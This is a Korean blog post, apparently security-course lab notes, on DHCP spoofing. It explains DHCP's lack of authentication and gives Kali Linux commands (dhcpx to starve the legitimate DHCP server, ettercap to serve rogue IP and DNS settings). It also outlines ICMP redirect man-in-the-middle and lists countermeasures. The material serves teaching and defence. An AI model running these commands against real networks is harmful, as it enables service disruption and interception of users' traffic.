본문 바로가기
보안과정/네트워크

DHCP Spoofing

by Luuii 2017. 10. 22.

[참고]https://perfumme.wordpress.com/2016/10/24/dhcp-%EA%B3%B5%EA%B2%A9/

반드시 참고

 

DHCP서비스의 취약점

> UDP로 동작하기에 인증 불가능

> UDP 자체가 비신뢰성 비연결지향성 프로토콜이기 때문에 인증 되어진 DHCP인지 판별 불가능

 

DHCP Spoofing

> 공격자가 DHCP를 위장하여 조작된 정보를 전송하는것.

 

[실습]

(Win2008 기본 설정)

 

(Kali Linux)

먼저 DHCP 서버를 죽여야한다.

# dhcpx -v -i eth0 -A -t 10 -D 192.168.10.254(DHCP 서버)

 

죽으면

 

스푸핑 시도.

# ettercap -T -M dhcp:192.168.10.128-133/255.255.255.0/192.168.10.50

>> # ettercap -T -M dhcp:[할당할 IP대역 / Subnet mask / 지정할 DNS주소]

(Win2008)

 

 

성공.


ICMP Redirect

기본 원리

>  

공격 대상의 defalut-gateway 주소가 공격자의 ip로 할당되고 MITM(중간자)공격이 가능해짐

DNS를 공격자 ip로 했기 때문에 공격 대상의 인터넷이 되지 않기에 fragrouter로 포트포워딩을 해주고 공격자의 ip로 dns를 만들어서 수행한다면 완벽하게 dns도 숨기면서 공격을 할수 있음.

 

대응방안

> 가장 확실한 대응방안은 DHCP를 사용하지 않고 수동으로 고정ip를 설정해 놓는 것.

 

> SNMP

> 방화벽(접근제어)

> WAF(Webp Application Firewall) - 웹방화벽

>> SQL Injection, XSS, CSRF 등 웹공격을 탐지하고 차단.

 

관리자별 입장

> 스위치를 모니터링 하거나, 스위치에 포트별 관리를 해야함 ( 네트워크 보안 )

 

반응형

'보안과정 > 네트워크' 카테고리의 다른 글

DNS Spoofing  (0) 2017.10.22
TCP SYN Flooding Attack  (0) 2017.10.22
Dos(Denial of Service) Attack Type  (0) 2017.10.22
전송계층(Transport Layer)  (0) 2017.10.19
IP주소  (0) 2017.10.18